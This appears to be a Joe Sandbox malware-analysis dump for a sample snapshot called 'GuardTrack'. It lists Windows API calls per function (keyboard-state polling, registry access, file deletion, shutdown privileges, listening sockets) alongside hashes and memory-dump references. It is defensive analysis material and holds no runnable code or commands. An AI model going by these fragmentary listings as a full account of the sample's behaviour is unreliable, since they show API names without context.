                                                            • Part of subcall function 00608E20: GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
                                                            • Part of subcall function 00608E20: GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
                                                            • Part of subcall function 00608E20: HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
                                                            • Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73
                                                            • Part of subcall function 00608EBD: GetProcessHeap.KERNEL32(00000008,00608916,00000000,00000000,?,00608916,?), ref: 00608EC9
                                                            • Part of subcall function 00608EBD: HeapAlloc.KERNEL32(00000000,?,00608916,?), ref: 00608ED0
                                                            • Part of subcall function 00608EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00608916,?), ref: 00608EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00608931
                                                          • _memset.LIBCMT ref: 00608946
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00608965
                                                          • GetLengthSid.ADVAPI32(?), ref: 00608976
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 006089B3
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006089CF
                                                          • GetLengthSid.ADVAPI32(?), ref: 006089EC
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006089FB
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00608A02
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00608A23
                                                          • CopySid.ADVAPI32(00000000), ref: 00608A2A
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00608A5B
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00608A81
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00608A95
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 83a2f4f267ece0c5ae50dc6c8a25deded5a99fabfc61d5802dbb9e86c7134458
                                                          • Instruction ID: a9224dfa2f0217ff74f3d5e070510017d0f3c2b2f5cf20353fdd7ac619e04544
                                                          • Opcode Fuzzy Hash: 83a2f4f267ece0c5ae50dc6c8a25deded5a99fabfc61d5802dbb9e86c7134458
                                                          • Instruction Fuzzy Hash: D9615675A40219FFDF04DFA5DC85AEEBB7AFF05300F04822AE955A7290DB319A04CB60
                                                          APIs
                                                            • Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00630B0C
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00630BAB
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00630C43
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00630E82
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00630E8F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: 81e9c72a03b552e6def11608c6ce0d14342f0c0be79d855db67d469e8ca406aa
                                                          • Instruction ID: 1010062ceb6f12148fac717f524c1b4bd5ee1ac14cba8cf270ca4884d03ad37c
                                                          • Opcode Fuzzy Hash: 81e9c72a03b552e6def11608c6ce0d14342f0c0be79d855db67d469e8ca406aa
                                                          • Instruction Fuzzy Hash: F1E15E35204211AFD714DF24C895E6BBBEAFF89714F04896DF44ADB2A2DA31EC05CB91
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00610530
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 006105B1
                                                          • GetKeyState.USER32(000000A0), ref: 006105CC
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 006105E6
                                                          • GetKeyState.USER32(000000A1), ref: 006105FB
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00610613
                                                          • GetKeyState.USER32(00000011), ref: 00610625
                                                          • GetAsyncKeyState.USER32(00000012), ref: 0061063D
                                                          • GetKeyState.USER32(00000012), ref: 0061064F
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00610667
                                                          • GetKeyState.USER32(0000005B), ref: 00610679
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: d3ef597f6cb1db72fa25c16774b4f0c1253d017f5bc736596ffaacac1b7bd923
                                                          • Instruction ID: 027736a361aef12950840f8aa7ee0f597fa6007a4fe83c7363e5fa3d19ad7d34
                                                          • Opcode Fuzzy Hash: d3ef597f6cb1db72fa25c16774b4f0c1253d017f5bc736596ffaacac1b7bd923
                                                          • Instruction Fuzzy Hash: C941A5645047CA6DFF3187648A043F5BEA3AB52304F0C505AD6C6467C2EAE499D8CFE2
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00614451
                                                          • __swprintf.LIBCMT ref: 0061445E
                                                            • Part of subcall function 005D38C8: __woutput_l.LIBCMT ref: 005D3921
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00614488
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00614494
                                                          • LockResource.KERNEL32(00000000), ref: 006144A1
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 006144C1
                                                          • LoadResource.KERNEL32(?,00000000), ref: 006144D3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 006144E2
                                                          • LockResource.KERNEL32(?), ref: 006144EE
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0061454F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: bc611327becbed602264e0837fbc329d00e360866b8d6e4b8d8e1651d368ec72
                                                          • Instruction ID: af1c67798debe4cee357fe99a1d2fa6f5f876e8a7e526cb6fab47e5270c19caf
                                                          • Opcode Fuzzy Hash: bc611327becbed602264e0837fbc329d00e360866b8d6e4b8d8e1651d368ec72
                                                          • Instruction Fuzzy Hash: 0031907550122AAFEB119FA0EC48AFB7BABFF09301F044415F915D7250DB70DA91DB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 29149852f4a2129d2ab20e81deb26c6d188e3ed7f818d4cf40fd7f263e4e2148
                                                          • Instruction ID: b88162372c855aaaad4b1238e6fea8bd207d89a6611a44bcb6b7255d6326b731
                                                          • Opcode Fuzzy Hash: 29149852f4a2129d2ab20e81deb26c6d188e3ed7f818d4cf40fd7f263e4e2148
                                                          • Instruction Fuzzy Hash: D121B7356056219FEB11AF20EC09B6E7BAAFF85711F018019FA06973A2CB74ED51CF94
                                                          APIs
                                                            • Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4
                                                            • Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00613D96
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00613E3E
                                                          • MoveFileW.KERNEL32(?,?), ref: 00613E51
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00613E6E
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00613E90
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00613EAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: 6f2725f6e969fce9d92fe577d25274e84a0dcfdfa2d7b7d22d07b5270e470c2c
                                                          • Instruction ID: 8b836a9ad3175e313e5b30ce2e6b36f5e7d138ee2bc0e7fe2c3f405dc55d32f0
                                                          • Opcode Fuzzy Hash: 6f2725f6e969fce9d92fe577d25274e84a0dcfdfa2d7b7d22d07b5270e470c2c
                                                          • Instruction Fuzzy Hash: 5151A53580121E9ECF15EBE0CA56EEDBB7AAF52300F244169E442B7292DF315F49CB64
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0061FA83
                                                          • FindClose.KERNEL32(00000000), ref: 0061FB96
                                                            • Part of subcall function 005B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6
                                                          • Sleep.KERNEL32(0000000A), ref: 0061FAB3
                                                          • _wcscmp.LIBCMT ref: 0061FAC7
                                                          • _wcscmp.LIBCMT ref: 0061FAE2
                                                          • FindNextFileW.KERNEL32(?,?), ref: 0061FB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 2185952417-438819550
                                                          • Opcode ID: 38ff61fb39805e8349fb17bc271ad4c465bcaebfeca0830760ace9d41cb2c9c1
                                                          • Instruction ID: ca1e22fbce690d65a5002541bcf7908c15f6868043cf7c7c4b020439d050736c
                                                          • Opcode Fuzzy Hash: 38ff61fb39805e8349fb17bc271ad4c465bcaebfeca0830760ace9d41cb2c9c1
                                                          • Instruction Fuzzy Hash: 2941A67190421A9FDF14DFA4CC59AEEBBB6FF05350F18416AF815A3291EB319E84CB50
                                                          APIs
                                                            • Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4
                                                            • Part of subcall function 00614FEC: GetFileAttributesW.KERNEL32(?,00613BFE), ref: 00614FED
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0061407C
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 006140CC
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 006140DD
                                                          • FindClose.KERNEL32(00000000), ref: 006140F4
                                                          • FindClose.KERNEL32(00000000), ref: 006140FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: c7516a84f5c8c403d742774755c8abba67b08e8c98b0b424be9b4f854ae427ab
                                                          • Instruction ID: 021da05c71ee180c4fce83ff0be58a3aa99dab3c1b1ae8684dd568daacaca294
                                                          • Opcode Fuzzy Hash: c7516a84f5c8c403d742774755c8abba67b08e8c98b0b424be9b4f854ae427ab
                                                          • Instruction Fuzzy Hash: 7D316F350093969FC300EBA4C899DEFBBA9BE96305F440A2DF5D183292DB719A09C756
                                                          APIs
                                                            • Part of subcall function 00609399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
                                                            • Part of subcall function 00609399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
                                                            • Part of subcall function 00609399: GetLastError.KERNEL32 ref: 0060941D
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 006157B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 2e31017bd5d3564982f555ffdf811945fcd0b88b654a0c1dac1b62937ea1e822
                                                          • Instruction ID: eda7c056a024a4be2adee7225d31d40fd7be371fc139aab8fe96bac43c2db4d7
                                                          • Opcode Fuzzy Hash: 2e31017bd5d3564982f555ffdf811945fcd0b88b654a0c1dac1b62937ea1e822
                                                          • Instruction Fuzzy Hash: 3D012B71750722EBF76C6269DC8BBFBF65BEB85740F1C0129F913D21D2EA505C808164
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006269C7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 006269D6
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 006269F2
                                                          • listen.WSOCK32(00000000,00000005), ref: 00626A01
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00626A1B
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00626A2F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 7179c17cd8415c50f773fa6d56f655eeae4e9755653fae0f473ea7dca7853792
                                                          • Instruction ID: ddec7183379061b9a2af254d3d890d956e09a504efd55834b32e7b436ca851cb
                                                          • Opcode Fuzzy Hash: 7179c17cd8415c50f773fa6d56f655eeae4e9755653fae0f473ea7dca7853792
                                                          • Instruction Fuzzy Hash: AF21EE346006219FDB10EF64D889AAEB7AAEF45720F148558F916A73D2CB30AC01CF91
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 005B1DD6
                                                          • GetSysColor.USER32(0000000F), ref: 005B1E2A
                                                          • SetBkColor.GDI32(?,00000000), ref: 005B1E3D
                                                            • Part of subcall function 005B166C: DefDlgProcW.USER32(?,00000020,?), ref: 005B16B4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 23e266bda79dcaefd35f493512ae5e792b07ba8d45a6d0c274eb6a91ba594fec
                                                          • Instruction ID: 31efa6cf76b5988823bce8e32bfa8b2127679d7aaf8e6fcbdd48c56f656f9ab9
                                                          • Opcode Fuzzy Hash: 23e266bda79dcaefd35f493512ae5e792b07ba8d45a6d0c274eb6a91ba594fec
                                                          • Instruction Fuzzy Hash: C6A149B1105C45BEEBAC6B6A8C69EFB3D5EFB41342FA00519F442D5195CA30BD01C2BE
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0061C329
                                                          • _wcscmp.LIBCMT ref: 0061C359
                                                          • _wcscmp.LIBCMT ref: 0061C36E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0061C37F
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0061C3AF
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 270ecce4838ff7fc183c8a983f7b99babcd59d07e988627a06b36f87aca95f9f
                                                          • Instruction ID: 5af0b39ad39688352d7dd6965123a0efaa073f011585ec6591d0a6e927769273
                                                          • Opcode Fuzzy Hash: 270ecce4838ff7fc183c8a983f7b99babcd59d07e988627a06b36f87aca95f9f
                                                          • Instruction Fuzzy Hash: 915188756046028FD714DF68C494AEEB7E9FF49320F14861EE966CB3A2DB30AD41CB91
                                                          APIs
                                                            • Part of subcall function 00628475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00626E89
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00626EB2
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00626EEB
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00626EF8
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00626F0C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: bfa4caf4b5f62ea459844f2b61da6ccec54446fa7499d2e1455ce4f8264e3958
                                                          • Instruction ID: ae088a4d491dad952f7ebe6206059452d07e21c33513b49e42241975e95aaf04
                                                          • Opcode Fuzzy Hash: bfa4caf4b5f62ea459844f2b61da6ccec54446fa7499d2e1455ce4f8264e3958
                                                          • Instruction Fuzzy Hash: D741D6756006116FDB20AF64DC8AFBE7BA9EF85710F048458FA45AB3D3DA70AD018F91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 4c100df9839f86c1543c44e8be6b65835d2e8535ebe562a2698b01e9effb797c
                                                          • Instruction ID: 9fd58ce99a81ec92e48e6cac5094f89f9e154f13a986994cbce01560cc678844
                                                          • Opcode Fuzzy Hash: 4c100df9839f86c1543c44e8be6b65835d2e8535ebe562a2698b01e9effb797c
                                                          • Instruction Fuzzy Hash: 6911C4763009229FE7215F269C84BAE7B9BFF85721F054529F947D7242CB30E9018AE1
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 0061CA75
                                                          • CoCreateInstance.OLE32(00643D3C,00000000,00000001,00643BAC,?), ref: 0061CA8D
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • CoUninitialize.OLE32 ref: 0061CCFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
